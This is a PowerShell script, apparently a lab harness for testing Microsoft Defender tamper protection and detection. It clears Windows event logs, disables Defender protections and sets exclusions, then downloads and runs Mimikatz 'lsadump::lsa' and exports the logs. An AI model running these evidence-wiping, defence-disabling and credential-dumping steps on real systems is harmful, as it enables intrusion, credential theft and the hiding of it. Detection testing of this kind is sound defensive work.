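# Normal PowerShell
#
# Microsoft Defender tamper / detection test harness, part 1 of 2.
# Clears the Defender, Application, System and Security event logs, then
# weakens Defender step by step (Set-MpPreference, MpCmdRun) so that part 2
# can check which of the EICAR and Mimikatz tests are still detected and
# which events survive into the exported .evtx files.
#
# WARNING: this deliberately disables endpoint protection and destroys
# evidence (event logs). Run it only on an isolated, disposable lab host
# with explicit authorization - never on a production or shared system.
#
# Every step below needs local administrator rights (wevtutil cl on the
# Security log, Set-MpPreference, MpCmdRun -RemoveDefinitions); fail at
# startup instead of half-applying the configuration.
#Requires -RunAsAdministrator

# Clear event logs
$EventLogs = @(
    "Microsoft-Windows-Windows Defender/Operational",
    "Microsoft-Windows-Windows Defender/WHC",
    "Application",
    "System",
    "Security"
)
foreach ($EventLogName in $EventLogs) {
    & wevtutil cl "$EventLogName"
    Write-Output "$(Get-Date -Format "yyyy-MM-dd HH:mm:ss") Eventlog `"$EventLogName`" was cleared"
}
Start-Sleep 60
# Timestamp reused by the export step (part 2) to name the .evtx files.
$StartDate = $(Get-Date -Format "yyyy-MM-dd-HHmmss")

# Start configuration changes
Write-Output "$(Get-Date -Format "yyyy-MM-dd HH:mm:ss") Start configuration changes"
# Tamper Protection caveat: when it is enabled, Set-MpPreference changes to
# real-time / behavior / IOAV / cloud protection are not applied even though
# the cmdlet may not report an error. Record the state up front so a
# "nothing changed" result in the exported logs is explainable.
Write-Output "$(Get-Date -Format "yyyy-MM-dd HH:mm:ss") IsTamperProtected=$((Get-MpComputerStatus).IsTamperProtected)"

# 1.1 Disable virus and threat protection
Set-MpPreference -DisableIOAVProtection $true -DisableEmailScanning $true -DisableBlockAtFirstSeen $true
Start-Sleep 60

# 1.2 Disable real-time protection
Set-MpPreference -DisableRealtimeMonitoring $true
Start-Sleep 60

# 1.3 Turning off behavior monitoring
Set-MpPreference -DisableBehaviorMonitoring $true
Start-Sleep 60

# 1.4 Disable cloud-delivered protection
Set-MpPreference -MAPSReporting 0 # Disabled
Start-Sleep 60

# 1.5 Disable signature updates
Set-MpPreference -SharedSignaturesPath "-"
Start-Sleep 60

# 1.6 Add exclusions path*
# Only C:\AVTest is excluded; C:\AVTest2 (used by the EICAR test in part 2)
# is presumably the non-excluded control case - confirm against part 2.
Set-MpPreference -ExclusionPath "C:\AVTest"
Start-Sleep 60

# 1.7 Disable automatic actions on detected threats
Set-MpPreference -UnknownThreatDefaultAction Allow -LowThreatDefaultAction Allow -HighThreatDefaultAction Allow -ModerateThreatDefaultAction Allow -SevereThreatDefaultAction Allow
Start-Sleep 60

# 1.8 Change default action for specific malware*
# Action 6 = Allow. The two threat IDs are presumably the EICAR test file and
# the Mimikatz detection exercised in part 2 - verify with Get-MpThreatCatalog.
Set-MpPreference -ThreatIDDefaultAction_Actions @(6,6) -ThreatIDDefaultAction_Ids @(2147519003,2147717805)
Start-Sleep 60

# 1.9 Removing security intelligence updates
& "$ENV:ProgramFiles\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All
Start-Sleep 60

# End of configuration
Write-Output "$(Get-Date -Format "yyyy-MM-dd HH:mm:ss") Configuration done."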
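# Try to update signatures
# Expected to fail or be a no-op after -SharedSignaturesPath "-" and
# -RemoveDefinitions in part 1; -Verbose keeps that evidence in the output.
Update-MpSignature -Verbose
Start-Sleep 60

# Test detection of Eicar
# The EICAR test string is matched byte-for-byte, so the file must contain
# plain ASCII without a BOM or trailing newline. In Windows PowerShell 5.1 the
# ">" redirection writes UTF-16LE with a BOM, which is not the EICAR
# signature and can silently produce a "not detected" result; write ASCII
# explicitly. Single quotes keep "$EICAR" / "$H" from being expanded.
$EicarString = 'X5O!P%@AP[4\PZX54(P^)7CC)7}$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H*'
$Paths = @("C:\AVTest\", "C:\AVTest2\")
foreach ($Path in $Paths) {
    New-Item -Type Directory -Path $Path -EA 0
    Set-Location $Path
    Set-Content -Path .\eicartest.file -Value $EicarString -Encoding Ascii -NoNewline
    Start-MpScan -ScanType CustomScan -ScanPath $Path
    # Still readable after the scan => the file was not removed/quarantined.
    Get-Content .\eicartest.file
    Start-Sleep 60
}

# Test detection of mimikatz
cd "C:\AVTest\"
$ProgressPreference = "SilentlyContinue"
[Net.ServicePointManager]::SecurityProtocol = ([Net.ServicePointManager]::SecurityProtocol -bor [Net.SecurityProtocolType]::Tls12)
# Supply-chain caveat: this downloads an executable over the network and runs
# it as administrator. Pin the release asset you validated by filling in its
# SHA256 below; while it is empty the hash is only logged (previous behavior).
$MimikatzUri = "https://github.com/gentilkiwi/mimikatz/releases/download/2.2.0-20210810-2/mimikatz_trunk.zip"
$MimikatzExpectedSha256 = ""
Invoke-WebRequest -Uri $MimikatzUri -OutFile "mimikatz.zip"
$ActualSha256 = (Get-FileHash -Algorithm SHA256 -Path "mimikatz.zip").Hash
Write-Output "$(Get-Date -Format "yyyy-MM-dd HH:mm:ss") mimikatz.zip SHA256=$ActualSha256"
if ($MimikatzExpectedSha256 -and ($ActualSha256 -ne $MimikatzExpectedSha256)) {
    throw "mimikatz.zip hash mismatch: expected $MimikatzExpectedSha256, got $ActualSha256"
}
# Unblock-File strips the Mark-of-the-Web (Zone.Identifier) so zone policy
# does not block the archive or the extracted binary from running.
Unblock-File "mimikatz.zip"
Expand-Archive -Path "mimikatz.zip" -DestinationPath .
# Execute mimikatz
# Credential-access activity that Defender / the event logs are expected to
# flag; this is the behavior under test, not a step that needs its output.
.\x64\mimikatz.exe "lsadump::lsa" "exit"

# Scan folder
Start-MpScan -ScanType CustomScan -ScanPath "C:\AVTest\"
Start-Sleep 60

# Export event logs
# $EventLogs and $StartDate are defined in part 1 of the script. "/" is not
# valid in a file name, so the channel name is flattened before use.
foreach ($EventLogName in $EventLogs) {
    $FileName = $EventLogName -replace "/", '-'
    $ExportPath = "C:\$($ENV:COMPUTERNAME)_$($FileName)-$($StartDate).evtx"
    & wevtutil epl "$EventLogName" "$ExportPath"
    Write-Output "$(Get-Date -Format "yyyy-MM-dd HH:mm:ss") Eventlog `"$EventLogName`" was exported to `"$ExportPath`""
}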